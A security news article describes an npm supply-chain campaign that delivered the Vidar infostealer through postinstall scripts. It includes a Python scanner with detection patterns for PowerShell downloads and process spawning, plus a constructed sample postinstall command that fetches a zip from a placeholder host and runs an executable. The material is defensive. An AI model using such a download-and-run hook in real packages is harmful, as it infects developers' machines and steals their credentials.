15+ NPM Packages Exploiting Windows Systems to Distribute Vidar Malware


Emergence of a Sophisticated Supply-Chain Attack

A sophisticated supply-chain attack has surfaced that specifically targets Windows systems via malicious npm packages, exploiting the trust inherent in open-source package distribution.

Between October 21 and 26, 2025, threat actors disseminated 17 malicious npm packages encompassing 23 distinct releases engineered to propagate Vidar infostealer malware.

This campaign capitalized on the inherent trust developers place in package registries, cleverly masquerading as benign packages, including Telegram bot helpers, icon libraries, and forks of well-known projects such as Cursor and React.

The attack was conducted through two newly established npm accounts, aartje and saliii229911, which published packages that were downloaded more than 2,240 times prior to their removal from the registry.

This distribution technique signifies a transformative approach for Vidar, which has historically been disseminated via phishing emails with malicious Office documents.

The duplicitous packaging and ostensibly legitimate functionalities facilitated the widespread propagation of malicious code before timely detection could occur.

Image caption: The package custom-tg-bot-plan presents as a legitimate SDK on its npm page.

Security researchers at Datadog Security Labs identified the campaign through their GuardDog static analyzer, which flagged numerous suspicious indicators, including post-install script execution and process spawning activities.

The investigation revealed that all packages executed identical attack chains via postinstall scripts; certain variants embedded PowerShell commands directly within the package.json scripts section.

Infection Mechanism and Technical Breakdown

The attack exhibits a remarkable simplicity in its execution. Upon installation of the compromised packages, post-installation scripts were automatically triggered, downloading an encrypted ZIP archive from the bullethost.cloud infrastructure.

The downloader scripts used hardcoded credentials to extract the archive, yielding bridle.exe, a previously unseen Go-compiled Vidar variant not seen before in npm distributions.

Once executed with system privileges, the malware initiated its data exfiltration process.
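The chain described above (an auto-run postinstall hook, a PowerShell download, an archive extraction and a spawned executable) is exactly the kind of pattern a static scanner such as the one that flagged this campaign looks for. As an added example written for this article, not code from Datadog's GuardDog or from any of the packages involved, the following scores npm lifecycle scripts for those indicators; the sample package.json contents, package names and the host name are constructed.

```python
import json
import re

# Lifecycle hooks npm runs automatically on install; the campaign used postinstall.
AUTO_RUN_HOOKS = ("preinstall", "install", "postinstall")

# Indicator regex and weight. Single hits are common in benign packages;
# the combination seen in this campaign pushes the score past the threshold.
INDICATORS = {
    "powershell": (re.compile(r"powershell|pwsh", re.I), 3),
    "download": (re.compile(r"Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b|DownloadFile|DownloadString", re.I), 3),
    "archive": (re.compile(r"\.zip\b|Expand-Archive|\bunzip\b|\b7z\b", re.I), 2),
    "execute": (re.compile(r"\.exe\b|Start-Process|child_process|spawn\(|execSync", re.I), 2),
    "obfuscation": (re.compile(r"-enc\b|-EncodedCommand|FromBase64String|eval\(", re.I), 3),
    "network_literal": (re.compile(r"https?://", re.I), 1),
}


def scan_package_json(text: str, threshold: int = 5) -> dict:
    """Return the auto-run hooks found, the indicators each hit, a score and a verdict."""
    scripts = json.loads(text).get("scripts") or {}
    hits, score = {}, 0
    for hook in AUTO_RUN_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        found = [name for name, (rx, _w) in INDICATORS.items() if rx.search(cmd)]
        hits[hook] = found
        score += sum(INDICATORS[name][1] for name in found)
    return {"hooks": hits, "score": score, "suspicious": score >= threshold}


# Constructed sample modelled on the campaign's chain; example.invalid is a placeholder, not a real host.
SUSPICIOUS_PKG = json.dumps({
    "name": "constructed-tg-bot-helper",
    "scripts": {
        "postinstall": 'powershell -c "Invoke-WebRequest https://example.invalid/p.zip -OutFile p.zip; '
                       'Expand-Archive p.zip .; Start-Process payload.exe"',
    },
})
# Constructed benign package with a postinstall native build: one hook, no indicators, not flagged.
NATIVE_PKG = json.dumps({"name": "constructed-native", "scripts": {"postinstall": "node-gyp rebuild"}})
# Constructed benign package with no auto-run hook at all.
BENIGN_PKG = json.dumps({"name": "constructed-icons", "scripts": {"build": "tsc -p ."}})

if __name__ == "__main__":
    for label, pkg in (("suspicious", SUSPICIOUS_PKG), ("native", NATIVE_PKG), ("benign", BENIGN_PKG)):
        print(label, scan_package_json(pkg))
```

A postinstall hook alone is not evidence of compromise, since many native modules legitimately build on install; the score is meant to prioritise packages for manual review, not to block them automatically.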

This Vidar variant is adept at gathering sensitive information, including browser credentials, cookies, cryptocurrency wallets, and system files, subsequently exfiltrating the pilfered data through command-and-control (C2) channels.

The malware identifies active C2 servers by probing hardcoded Telegram and Steam throwaway accounts that house regularly updated C2 domains.

Subsequent to successful data exfiltration, the malware meticulously purges traces of its activities, complicating post-compromise detection efforts.


This campaign exemplifies a sophisticated understanding of vulnerabilities inherent in the npm ecosystem.

Threat actors oscillated between multiple C2 domains and employed variations in post-install script implementations, presumably to obscure detection by pattern-based systems.

All affected packages remained available on npm for roughly two weeks, marking this as one of the most significant npm-based malware campaigns targeting both enterprise development environments and individual developers globally.

Source link: Cybersecuritynews.com.


Reported By

RS Web Solutions
